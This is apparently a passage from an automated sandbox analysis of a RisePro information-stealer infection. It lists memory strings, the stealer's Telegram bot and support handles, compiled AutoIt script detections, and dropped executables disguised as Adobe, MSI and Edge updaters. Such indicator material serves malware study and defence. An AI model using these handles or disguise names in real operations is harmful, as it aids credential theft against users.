                          Source: firefox.exe, 00000024.00000003.2556318655.000001545FDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
                          Source: firefox.exe, 00000024.00000003.2556631693.000001545C3B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
                          Source: firefox.exe, 00000024.00000003.2556631693.000001545C3B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
                          Source: firefox.exe, 00000024.00000003.2556631693.000001545C3B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
                          Source: firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                          Source: firefox.exe, 00000024.00000003.2829883257.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2963701016.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3308363713.00000154624C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462266000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2679446441.0000015462266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com
                          Source: firefox.exe, 00000024.00000003.2680049158.0000015462239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/
                          Source: firefox.exe, 00000024.00000003.2680049158.0000015462235000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
                          Source: firefox.exe, 00000024.00000003.3058703225.000001545C2CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2705767411.000001545C2CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2700569964.000001545E4CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                          Source: firefox.exe, 00000024.00000003.3149769273.000001546379D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                          Source: firefox.exe, 00000024.00000003.2543948249.00000154624C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
                          Source: firefox.exe, 00000024.00000003.3119695544.0000015463114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT35JH&=V
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot$
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot;
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botFB
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botG
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bote
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botisepro_bot
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botriseprov
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.x
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                          Source: firefox.exe, 00000024.00000003.2556318655.000001545FDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webpack.js.org/concepts/mode/)
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2512039904.000001545C195000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                          Source: firefox.exe, 00000024.00000003.2682813977.00000154620E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                          Source: firefox.exe, 00000024.00000003.2705767411.000001545C2EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
                          Source: I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: firefox.exe, 00000024.00000003.2683298473.0000015462047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                          Source: firefox.exe, 00000024.00000003.2512556062.0000015461F32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2508540911.000001545C141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search
                          Source: firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                          Source: I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: firefox.exe, 00000024.00000003.2682498384.00000154620FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2466570051.00000154500BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: firefox.exe, 00000024.00000003.2680917978.0000015462217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
                          Source: firefox.exe, 00000024.00000003.3149769273.000001546379D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: firefox.exe, 00000024.00000003.2544170039.0000015462470000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2544441919.000001546244B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3119695544.0000015463114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3119695544.000001546317C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3119695544.000001546319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
                          Source: firefox.exe, 00000024.00000003.2550713166.000001546253B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                          Source: firefox.exe, 00000023.00000002.2436802785.000001F3C9440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                          Source: firefox.exe, 00000023.00000002.2436802785.000001F3C9440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com--attempting-deelevation
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3162934326.000001545508B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3226617905.0000015461F4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2946754613.0000290E28A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3279722819.000001545C4B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3101971080.000001546273D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3108638355.0000015461F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3272678888.000001545508B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3256356812.0000015455286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: firefox.exe, 00000024.00000003.2946754613.0000290E28A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/Z
                          Source: firefox.exe, 0000001F.00000002.2388590768.00000159B5200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.comC:

                          System Summary

                          barindex
                          Binary is likely a compiled AutoIt script file
                          Source: I2jCDr35mu.exe, 00000000.00000003.2301162754.00000000060E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d3c3d692-2
                          Source: I2jCDr35mu.exe, 00000000.00000003.2301162754.00000000060E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4fa06923-4
                          Source: MPGPH131.exe, 00000006.00000003.2671445352.0000000006719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a5096619-c
                          Source: MPGPH131.exe, 00000006.00000003.2671445352.0000000006719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_085e55bd-4
                          Source: MPGPH131.exe, 00000007.00000003.2450769589.000000000679A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3a219e65-9
                          Source: MPGPH131.exe, 00000007.00000003.2450769589.000000000679A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_bd9aac8e-9
                          Source: KFLpYwMPXjapw3SVf9HA.exe, 0000000B.00000000.2305248683.0000000000102000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cb9be037-d
                          Source: KFLpYwMPXjapw3SVf9HA.exe, 0000000B.00000000.2305248683.0000000000102000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_824b0d89-9
                          PE file contains section with special chars
                          Source: I2jCDr35mu.exeStatic PE information: section name:
                          Source: I2jCDr35mu.exeStatic PE information: section name: .idata
                          Source: I2jCDr35mu.exeStatic PE information: section name:
                          Source: RageMP131.exe.0.drStatic PE information: section name:
                          Source: RageMP131.exe.0.drStatic PE information: section name: .idata
                          Source: RageMP131.exe.0.drStatic PE information: section name:
                          Source: MPGPH131.exe.0.drStatic PE information: section name:
                          Source: MPGPH131.exe.0.drStatic PE information: section name: .idata
                          Source: MPGPH131.exe.0.drStatic PE information: section name:
                          Source: ladas[1].exe.0.drStatic PE information: section name:
                          Source: ladas[1].exe.0.drStatic PE information: section name: .idata
                          Source: ladas[1].exe.0.drStatic PE information: section name:
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name:
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: .idata
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name:
                          Source: amert[1].exe.0.drStatic PE information: section name:
                          Source: amert[1].exe.0.drStatic PE information: section name: .idata
                          Source: amert[1].exe.0.drStatic PE information: section name:
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name:
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: .idata
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name:
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: .idata
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: .idata
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: EdgeMS131.exe.0.drStatic PE information: section name:
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: .idata
                          Source: EdgeMS131.exe.0.drStatic PE information: section name:
                          Source: niks[1].exe.0.drStatic PE information: section name:
                          Source: niks[1].exe.0.drStatic PE information: section name: .idata
                          Source: niks[1].exe.0.drStatic PE information: section name:
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name:
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: .idata
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name:
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name:
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: .idata
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name:
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name:
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: .idata
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name:
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name:
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: .idata
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name:
                          Source: ladas[1].exe.7.drStatic PE information: section name:
                          Source: ladas[1].exe.7.drStatic PE information: section name: .idata
                          Source: ladas[1].exe.7.drStatic PE information: section name:
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name:
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: .idata
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name:
                          Source: amert[1].exe.7.drStatic PE information: section name:
                          Source: amert[1].exe.7.drStatic PE information: section name: .idata
                          Source: amert[1].exe.7.drStatic PE information: section name:
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name:
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: .idata
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name:
                          Source: niks[1].exe.7.drStatic PE information: section name:
                          Source: niks[1].exe.7.drStatic PE information: section name: .idata
                          Source: niks[1].exe.7.drStatic PE information: section name:
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name:
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: .idata
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name:
                          Source: explorgu.exe.47.drStatic PE information: section name:
                          Source: explorgu.exe.47.drStatic PE information: section name: .idata
                          Source: explorgu.exe.47.drStatic PE information: section name:
                          PE file has nameless sections
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
